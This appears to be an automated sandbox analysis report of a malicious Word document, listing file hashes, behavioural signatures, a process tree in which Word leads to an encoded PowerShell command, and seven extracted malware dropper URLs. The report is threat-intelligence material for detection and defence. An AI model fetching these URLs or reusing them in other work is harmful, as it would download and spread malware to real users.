
Analysis

  • max time kernel
    117s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags
    arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
  • submitted
    28/05/2024, 18:11

General

  • Target

    7de5db6870aab3425bcf4f0b03977d4e_JaffaCakes118.doc

  • Size

    155KB

  • MD5

    7de5db6870aab3425bcf4f0b03977d4e

  • SHA1

    74afe807f26bc2d2676f6924fc671055a6cbd52e

  • SHA256

    c0d8ad4aed593521165bea2e923bbe309fac7277745027f3a54b57d4ac76161a

  • SHA512

    c5193f951b776b48d634d76c5288ef72450188926210df8eed3b085fc9e61b4ca1cf0035bf0a0a619c0a66e16c230a4ed6811964b1ccf314c9a76d4cd3492587

  • SSDEEP

    1536:CINj/tINj/ardi1Ir77zOH98Wj2gpngB+a9/pNvuaRlYYP46/3k/W+U9iSvgR0wW:VrfrzOH98ipgrNQYP4zIa0wW

Score
10/10

Malware Config

Extracted

  • Language
    ps1
  • Source
    URLs
  • exe.dropper
    http://asfckmusic.com/axhhy/2/
  • exe.dropper
    http://webtalavera.com/site/1nBdLgY/
  • exe.dropper
    http://varthana.com/archive/sEaku/
  • exe.dropper
    http://rjsoft.nl/helpdesk/8TQ54h/
  • exe.dropper
    http://zoomandshootphotography.com/wp-includes/MPkwrU2/
  • exe.dropper
    http://prodel.com.br/pedidos/Sp9/
  • exe.dropper
    http://iemsys.co.za/fsffa.co.za/2ntFq/

Signatures

  • Process spawned unexpected child process (1 IoCs)

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request (4 IoCs)
  • Drops file in System32 directory (1 IoCs)
  • Drops file in Windows directory (1 IoCs)
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings (1 TTPs, 31 IoCs)
  • Modifies registry class (64 IoCs)
  • Suspicious behavior: AddClipboardFormatListener (1 IoCs)
  • Suspicious behavior: EnumeratesProcesses (1 IoCs)
  • Suspicious use of AdjustPrivilegeToken (1 IoCs)
  • Suspicious use of SetWindowsHookEx (2 IoCs)
  • Suspicious use of WriteProcessMemory (4 IoCs)

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE (PID 2176)
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\7de5db6870aab3425bcf4f0b03977d4e_JaffaCakes118.doc"
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    • C:\Windows\splwow64.exe (PID 3012, child of WINWORD.EXE)
      C:\Windows\splwow64.exe 12288
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2552)
    powershell -e <encoded command removed>
    • Process spawned unexpected child process
    • Blocklisted process makes network request
    • Drops file in System32 directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm
    • Filesize
      20KB
    • MD5
      a5c0a87998bc101ef9863abe6c0d72f7
    • SHA1
      f2d8e5309e589623d3575f301877951e339f7e1c
    • SHA256
      33bd742af279eeb5162d2d311ca309413a9ccec49a1271f384812943c1e83b49
    • SHA512
      6e852bedc7ad0366561721a0bc32dbf54d3da413749fa4a3c7cc47a75f4dfbf9ab8f1698e7c69d698d298582ebc68ce86d81274c2d05419486b9c6bf440344c3

  Memory dumps (file, filesize):
  • memory/2176-33-0x0000000004E90000-0x0000000004F90000-memory.dmp (1024KB)
  • memory/2176-45-0x0000000070FCD000-0x0000000070FD8000-memory.dmp (44KB)
  • memory/2176-7-0x0000000004E90000-0x0000000004F90000-memory.dmp (1024KB)
  • memory/2176-21-0x0000000004E90000-0x0000000004F90000-memory.dmp (1024KB)
  • memory/2176-22-0x0000000004E90000-0x0000000004F90000-memory.dmp (1024KB)
  • memory/2176-32-0x0000000004E90000-0x0000000004F90000-memory.dmp (1024KB)
  • memory/2176-31-0x0000000004E90000-0x0000000004F90000-memory.dmp (1024KB)
  • memory/2176-0-0x000000002F901000-0x000000002F902000-memory.dmp (4KB)
  • memory/2176-2-0x0000000070FCD000-0x0000000070FD8000-memory.dmp (44KB)
  • memory/2176-70-0x0000000070FCD000-0x0000000070FD8000-memory.dmp (44KB)
  • memory/2176-69-0x000000005FFF0000-0x0000000060000000-memory.dmp (64KB)
  • memory/2176-46-0x0000000004E90000-0x0000000004F90000-memory.dmp (1024KB)
  • memory/2176-48-0x0000000005B40000-0x0000000005C40000-memory.dmp (1024KB)
  • memory/2176-49-0x0000000004E90000-0x0000000004F90000-memory.dmp (1024KB)
  • memory/2176-50-0x0000000004E90000-0x0000000004F90000-memory.dmp (1024KB)
  • memory/2176-1-0x000000005FFF0000-0x0000000060000000-memory.dmp (64KB)
  • memory/2552-40-0x0000000002240000-0x0000000002248000-memory.dmp (32KB)
  • memory/2552-39-0x000000001B6F0000-0x000000001B9D2000-memory.dmp (2.9MB)